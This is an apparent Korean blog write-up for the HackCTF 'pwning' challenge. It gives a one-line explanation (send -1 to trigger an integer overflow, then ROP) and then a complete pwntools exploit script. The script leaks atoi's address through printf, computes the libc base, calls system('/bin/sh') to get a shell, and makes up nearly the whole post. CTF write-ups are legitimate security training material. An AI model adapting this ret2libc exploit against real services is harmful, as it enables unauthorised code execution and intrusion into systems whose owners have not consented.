정수 오버플로우를 이용한 문제
-1를 주고 rop를 진행하면 된다
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3019)
e = ELF('./pwning', checksec=False)
# context.log_level = 'debug'
r.sendlineafter('? ','-1')
r.recvuntil('!\n')
payload = 'A'*48
payload += p32(e.plt['printf'])
payload += p32(0x080484e1)
payload += p32(e.got['atoi'])
payload += p32(e.sym['main'])
r.sendline(payload)
r.recvuntil('\n')
leak = u32(r.recv(4))
print(hex(leak))
libc_base = leak - 0x02d050
system = libc_base + 0x03a940
binsh = libc_base + 0x15902b
payload = 'A'*48
payload += p32(system)
payload += 'AAAA'
payload += p32(binsh)
r.sendlineafter('? ','-1')
r.sendline(payload)
r.interactive()'HackCTF' 카테고리의 다른 글
| HackCTF - ROP (0) | 2021.11.26 |
|---|---|
| HackCTF - UAF (0) | 2021.11.26 |
| HackCTF - Gift (0) | 2021.11.22 |
| HackCTF - Look at me (0) | 2021.11.22 |
| HackCTF - Beginner_Heap (0) | 2021.11.22 |
